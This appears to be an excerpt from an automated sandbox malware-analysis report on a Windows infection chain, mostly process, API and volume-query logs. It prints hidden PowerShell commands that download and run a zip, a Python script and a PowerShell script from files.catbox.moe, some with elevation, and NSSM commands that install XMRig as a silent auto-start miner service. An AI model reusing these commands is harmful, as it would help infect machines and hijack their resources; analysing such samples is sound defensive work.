                    Source: svchost.exe, 00000007.00000002.3753715311.0000026F30002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                    Source: svchost.exe, 00000007.00000002.3755067786.0000026F30072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: svchost.exe, 00000007.00000002.3755067786.0000026F30064000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
                    Source: svchost.exe, 00000007.00000002.3755067786.0000026F30072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.3755333340.0000026F3008F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.3755067786.0000026F30072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 0000000B.00000002.3754804709.000002169B82B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2625159439.0000025EF76BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2373129297.000001B6502F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\ProgramData\.logstxt\nssm.exeAPI call chain: ExitProcess graph end nodegraph_19-9592
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001A020 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_000000014001A020
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001FE78 LoadLibraryA,GetProcAddress,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,19_2_000000014001FE78
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_00000001400070A0 GetUserDefaultLCID,FormatMessageW,FormatMessageW,GetProcessHeap,HeapAlloc,_snwprintf_s,19_2_00000001400070A0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001A020 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_000000014001A020
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_0000000140017480 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0000000140017480
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001D4A8 SetUnhandledExceptionFilter,19_2_000000014001D4A8
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_0000000140020110 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000000140020110
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014000C6B0 GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetCommandLineW,_snwprintf_s,ShellExecuteExW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,19_2_000000014000C6B0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:TEMP; Start-Process powershell -verb runas -ArgumentList '-WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ;'"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('"fun.zip','.'); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ; Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ; Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" install xmrig C:\ProgramData\.logstxt\xmrig.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppDirectory C:\ProgramData\.logstxt
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppParameters "xmrig.exe -B -c config.json"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" start xmrig
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig start SERVICE_AUTO_START
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppNoConsole 1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig Type SERVICE_WIN32_OWN_PROCESS
                    Source: C:\ProgramData\.logstxt\nssm.exeProcess created: C:\ProgramData\.logstxt\xmrig.exe "C:\ProgramData\.logstxt\xmrig.exe" xmrig.exe -B -c config.json
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:temp; start-process powershell -argumentlist '-windowstyle hidden cd $env:temp; set-variable progresspreference silentlycontinue; invoke-webrequest https://files.catbox.moe/d6pvcr.zip -outfile fun.zip; add-type -assembly system.io.compression.filesystem; [system.io.compression.zipfile]::extracttodirectory(''""fun.zip''"",''"".''""); (invoke-webrequest https://files.catbox.moe/gw2gji.py -usebasicparsing).content | ./pyops/python.exe - ;'"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden cd $env:temp; set-variable progresspreference silentlycontinue; invoke-webrequest https://files.catbox.moe/d6pvcr.zip -outfile fun.zip; add-type -assembly system.io.compression.filesystem; [system.io.compression.zipfile]::extracttodirectory('"fun.zip','.'); (invoke-webrequest https://files.catbox.moe/gw2gji.py -usebasicparsing).content | ./pyops/python.exe - ;
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:temp; start-process powershell -verb runas -argumentlist '-windowstyle hidden set-variable progresspreference silentlycontinue; invoke-webrequest https://files.catbox.moe/ei5hyq.ps1 -outfile funny.tmp -usebasicparsing; get-content -raw funny.tmp | powershell.exe - ;'"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden set-variable progresspreference silentlycontinue; invoke-webrequest https://files.catbox.moe/ei5hyq.ps1 -outfile funny.tmp -usebasicparsing; get-content -raw funny.tmp | powershell.exe - ;
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:temp; start-process powershell -argumentlist '-windowstyle hidden cd $env:temp; set-variable progresspreference silentlycontinue; invoke-webrequest https://files.catbox.moe/d6pvcr.zip -outfile fun.zip; add-type -assembly system.io.compression.filesystem; [system.io.compression.zipfile]::extracttodirectory(''""fun.zip''"",''"".''""); (invoke-webrequest https://files.catbox.moe/gw2gji.py -usebasicparsing).content | ./pyops/python.exe - ;'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:temp; start-process powershell -verb runas -argumentlist '-windowstyle hidden set-variable progresspreference silentlycontinue; invoke-webrequest https://files.catbox.moe/ei5hyq.ps1 -outfile funny.tmp -usebasicparsing; get-content -raw funny.tmp | powershell.exe - ;'"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden cd $env:temp; set-variable progresspreference silentlycontinue; invoke-webrequest https://files.catbox.moe/d6pvcr.zip -outfile fun.zip; add-type -assembly system.io.compression.filesystem; [system.io.compression.zipfile]::extracttodirectory('"fun.zip','.'); (invoke-webrequest https://files.catbox.moe/gw2gji.py -usebasicparsing).content | ./pyops/python.exe - ; Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden set-variable progresspreference silentlycontinue; invoke-webrequest https://files.catbox.moe/ei5hyq.ps1 -outfile funny.tmp -usebasicparsing; get-content -raw funny.tmp | powershell.exe - ; Jump to behavior
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014000C600 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_000000014000C600
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: GetLocaleInfoA,19_2_0000000140020928
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014000B0D0 GetSystemTime,PathFindExtensionW,_snwprintf_s,_snwprintf_s,19_2_000000014000B0D0

